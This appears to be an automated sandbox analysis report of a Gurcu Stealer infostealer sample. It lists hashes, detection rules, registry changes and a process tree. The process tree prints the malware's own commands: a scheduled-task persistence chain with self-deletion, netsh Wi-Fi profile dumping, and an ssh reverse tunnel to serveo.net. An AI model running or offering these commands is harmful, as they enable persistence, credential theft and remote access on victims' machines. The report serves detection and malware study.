Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
09-09-2023 13:58
Behavioral task
behavioral1
Sample
6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
Resource
win10v2004-20230831-en
General
-
Target
6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
-
Size
53.4MB
-
MD5
a43b860d290321de53ed6deb5cae95af
-
SHA1
62cc70d91f7e39fc93b9b0f106f78a90cfc54047
-
SHA256
6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
-
SHA512
535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5
-
SSDEEP
6144:wGWM/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccH19bqjWVHQDcXeUa:cmRatpvnzZjDv7oj19yTuj+H9XRa
Malware Config
Signatures
-
Detect Gurcu Stealer V3 payload 7 IoCs
resource yara_rule behavioral1/memory/2408-0-0x0000000000090000-0x00000000000F2000-memory.dmp family_gurcu_v3 behavioral1/memory/2408-2-0x00000000004D0000-0x0000000000550000-memory.dmp family_gurcu_v3 behavioral1/files/0x0032000000016ccd-7.dat family_gurcu_v3 behavioral1/files/0x0032000000016ccd-8.dat family_gurcu_v3 behavioral1/memory/2600-9-0x0000000000F20000-0x0000000000F82000-memory.dmp family_gurcu_v3 behavioral1/memory/2600-11-0x000000001AF70000-0x000000001AFF0000-memory.dmp family_gurcu_v3 behavioral1/files/0x0032000000016ccd-208.dat family_gurcu_v3 -
Deletes itself 1 IoCs
pid Process 2128 cmd.exe -
Executes dropped EXE 4 IoCs
pid Process 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 1860 ssh.exe 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 2472 ssh.exe -
Loads dropped DLL 2 IoCs
pid Process 1860 ssh.exe 2472 ssh.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2672 schtasks.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2708 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2408 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Token: SeDebugPrivilege 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe Token: SeDebugPrivilege 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2408 wrote to memory of 2128 2408 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 28 PID 2408 wrote to memory of 2128 2408 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 28 PID 2408 wrote to memory of 2128 2408 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 28 PID 2128 wrote to memory of 2696 2128 cmd.exe 30 PID 2128 wrote to memory of 2696 2128 cmd.exe 30 PID 2128 wrote to memory of 2696 2128 cmd.exe 30 PID 2128 wrote to memory of 2708 2128 cmd.exe 31 PID 2128 wrote to memory of 2708 2128 cmd.exe 31 PID 2128 wrote to memory of 2708 2128 cmd.exe 31 PID 2128 wrote to memory of 2672 2128 cmd.exe 32 PID 2128 wrote to memory of 2672 2128 cmd.exe 32 PID 2128 wrote to memory of 2672 2128 cmd.exe 32 PID 2128 wrote to memory of 2600 2128 cmd.exe 33 PID 2128 wrote to memory of 2600 2128 cmd.exe 33 PID 2128 wrote to memory of 2600 2128 cmd.exe 33 PID 2600 wrote to memory of 544 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 34 PID 2600 wrote to memory of 544 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 34 PID 2600 wrote to memory of 544 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 34 PID 544 wrote to memory of 2452 544 cmd.exe 36 PID 544 wrote to memory of 2452 544 cmd.exe 36 PID 544 wrote to memory of 2452 544 cmd.exe 36 PID 544 wrote to memory of 1004 544 cmd.exe 37 PID 544 wrote to memory of 1004 544 cmd.exe 37 PID 544 wrote to memory of 1004 544 cmd.exe 37 PID 544 wrote to memory of 2808 544 cmd.exe 38 PID 544 wrote to memory of 2808 544 cmd.exe 38 PID 544 wrote to memory of 2808 544 cmd.exe 38 PID 2600 wrote to memory of 1856 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 39 PID 2600 wrote to memory of 1856 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 39 PID 2600 wrote to memory of 1856 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 39 PID 1856 wrote to memory of 1428 1856 cmd.exe 41 PID 1856 wrote to memory of 1428 1856 cmd.exe 41 PID 1856 wrote to memory of 1428 1856 cmd.exe 41 PID 1856 wrote to memory of 1140 1856 cmd.exe 42 PID 1856 wrote to memory of 1140 1856 cmd.exe 42 PID 1856 wrote to memory of 1140 1856 cmd.exe 42 PID 1856 wrote to memory of 1656 1856 cmd.exe 43 PID 1856 wrote to memory of 1656 1856 cmd.exe 43 PID 1856 wrote to memory of 1656 1856 cmd.exe 43 PID 2600 wrote to memory of 1860 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 45 PID 2600 wrote to memory of 1860 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 45 PID 2600 wrote to memory of 1860 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 45 PID 2600 wrote to memory of 1860 2600 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 45 PID 1444 wrote to memory of 2716 1444 taskeng.exe 50 PID 1444 wrote to memory of 2716 1444 taskeng.exe 50 PID 1444 wrote to memory of 2716 1444 taskeng.exe 50 PID 2716 wrote to memory of 1980 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 51 PID 2716 wrote to memory of 1980 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 51 PID 2716 wrote to memory of 1980 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 51 PID 2716 wrote to memory of 2472 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 53 PID 2716 wrote to memory of 2472 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 53 PID 2716 wrote to memory of 2472 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 53 PID 2716 wrote to memory of 2472 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 53 PID 1980 wrote to memory of 2520 1980 cmd.exe 54 PID 1980 wrote to memory of 2520 1980 cmd.exe 54 PID 1980 wrote to memory of 2520 1980 cmd.exe 54 PID 1980 wrote to memory of 2540 1980 cmd.exe 56 PID 1980 wrote to memory of 2540 1980 cmd.exe 56 PID 1980 wrote to memory of 2540 1980 cmd.exe 56 PID 1980 wrote to memory of 2752 1980 cmd.exe 55 PID 1980 wrote to memory of 2752 1980 cmd.exe 55 PID 1980 wrote to memory of 2752 1980 cmd.exe 55 PID 2716 wrote to memory of 2824 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 58 PID 2716 wrote to memory of 2824 2716 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe 58 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2696
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2708
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2672
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:2452
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:1004
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:2808
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:1428
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵PID:1140
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2598 serveo.net4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1860
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {79F8C408-9CC4-42FD-8206-69DEF0935CA1} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exeC:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2716 -
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"3⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:2520
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"4⤵PID:2752
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:2540
-
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2598 serveo.net3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2472
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"3⤵PID:2824
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:2508
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵PID:2288
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"4⤵PID:2324
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
393B
MD518015a60cd12f33648facec1263cfafa
SHA131b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA2569ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD524e41fef3aa9b04cae1a38e4c2b863ac
SHA1b2a905fde1f6f778fca66270e861c92c55078fc2
SHA2564812b7652cfc4ce58559bbba0144cf9a462af28789aaa599e2a2c2ab6b159e90
SHA5121ee9e4add5f91bd92dada987946a9f85e2d58763dd041ae293a2a48c3a358c754301b06abd07c971543bfb694441b18abcf1d0f53da0e031328b151b4c3ce0f1
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
